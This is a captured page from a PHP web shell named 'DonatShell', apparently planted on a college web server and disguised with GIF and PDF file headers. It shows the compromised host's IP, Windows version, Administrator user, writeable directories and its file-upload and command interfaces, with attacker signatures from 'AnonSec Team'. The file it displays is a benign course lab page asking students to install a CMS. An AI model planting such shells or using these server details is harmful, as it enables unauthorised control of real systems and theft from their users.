GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : 134.29.175.74  /  Your IP : 216.73.216.160
Web Server : nginx/1.10.2
System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586
User : Administrator ( 0)
PHP Version : 7.1.0
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/nginx/html/JimMartinson/_Archive/MMDT1144/Labs/Lab12/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : C:/nginx/html/JimMartinson/_Archive/MMDT1144/Labs/Lab12//Lab12.phpinc
<?
// JimMartinson/MMDT1144/Labs/Lab07/index.phpinc

$TRACK = "<b>".basename(__FILE__).'</b> <span class="pv_fl">('.__FILE__.")</span>\n<ol>\n";
ini_set('include_path',ini_get('include_path').PATH_SEPARATOR.$_SERVER['DOCUMENT_ROOT']."/"); // Add the DOCUMENT_ROOT to the include_path.
include('application.phpinc');

$css .= ',colorCode.css';

//$showEvaluationVariables = true;
require('Gradebook/EvaluationSubmission_BEGIN.phpinc'); // Replaced.

?>

<a name="Lab"></a>
<fieldset><legend>Description</legend>
Demonstrate the ability to install a Content Management System. <span class="note">Only MySQL database support is available at this time.</span><br>
<?=$gradeNote?>
</fieldset>
<?
$ShowSpanCountBefore = false;
#$ShowSpanCountBefore = true;
$query = "SELECT @@version AS version";
$MySQLversionResult = query_do($query);
//d_Var('$MySQLversionResult',$MySQLversionResult,'d');
mysql_data_seek($MySQLversionResult, 0);
$MySQLversionInfo = mysql_fetch_assoc($MySQLversionResult);
$MySQLversion = $MySQLversionInfo['version'];
//d_Var('$MySQLversion',$MySQLversion,'d');
$PHPversion = phpversion();
if (defined('PDO::ATTR_DRIVER_NAME')) {
	$PDOavailable = 'available';
} else {
	$PDOavailable = '<span class="error">not available</span>';
}
?>
<fieldset><legend><?=$evaluationType?> Instruction</legend>
<span class="bold attention">Do not perform this lab until Lab 2 has been graded.</span>
<ol id="main" class="count">
	<li>Create a directory called <b><?=$evaluationName?></b> in your site root. All work for this lab will be placed there.</li>
	<li>Select a CMS to install.
		<br><span class="note">You can only install a CMS that supports the MySQL and PHP versions running on the CST website.
		<br>CST website MySQL Version = <?=$MySQLversion?>.
		<br>CST website PHP Version = <?=$PHPversion?>.
		<br>CST website PDO is <?=$PDOavailable?>.
		</span>
	</li>
	<li>Install your CMS to the <?=$evaluationName?> directory and upload it to the cst.ridgewater.edu site.</li>
	<li>Configure your CMS on your <a href="http://cst.ridgewater.edu/Student/<?=$userFileName?>">cst.ridgewater.edu/Student/<?=$userFileName?></a> site.<br>
		You will need a database and database user configured for your CMS Install. One has already been setup for you:
		<br>Your database name, database user, and user passowrd are <b><?=strtolower($userFileName)?></b>.
	</li>
	<li>
		Document your CMS information:
		<ol>
			<li>Create a text file with the name <b>!administrator.txt</b> and save it in your <b><?=$evaluationName?></b> directory</li>
			<li>Put the following information in the file:
				<ul>
					<li>Name of the CMS you installed.</li>
					<li>Version of the CMS you installed.</li>
					<li>Link to where you downloaded the CMS you installed from.</li>
					<li>CMS administrator login name.</li>
					<li>CMS administrator login password.</li>
				</ul>
			  <span class="note">Be sure to upload the <b>!administrator.txt</b> file.</span></li>
		</ol>
	</li>
  <li>Turn in your assignment:
		<ol type="a">
			<li>Ensure you have uploaded all work to your site (<a href="http://cst.ridgewater.edu/Student/<?=$userFileName?>/">http://cst.ridgewater.edu/Student/<?=$userFileName?>/</a>) and that the CMS is working correctly.</li>
			<li>Then <input type="submit" name="f_subtask" id="inpSubmit" value="Submit"> for grading.</li>
		</ol>
  </li>
</ol>
<?=$gradeNote?>
</fieldset>
<script src="/js/colorCode.js"></script>
<?
require('Gradebook/EvaluationSubmission_END.phpinc'); // Replaced.
if ($TRACK != '') $_SESSION['TRACK'] .= "<li>End ".basename(__FILE__)."</ol>\n";
?>

Anon7 - 2022
AnonSec Team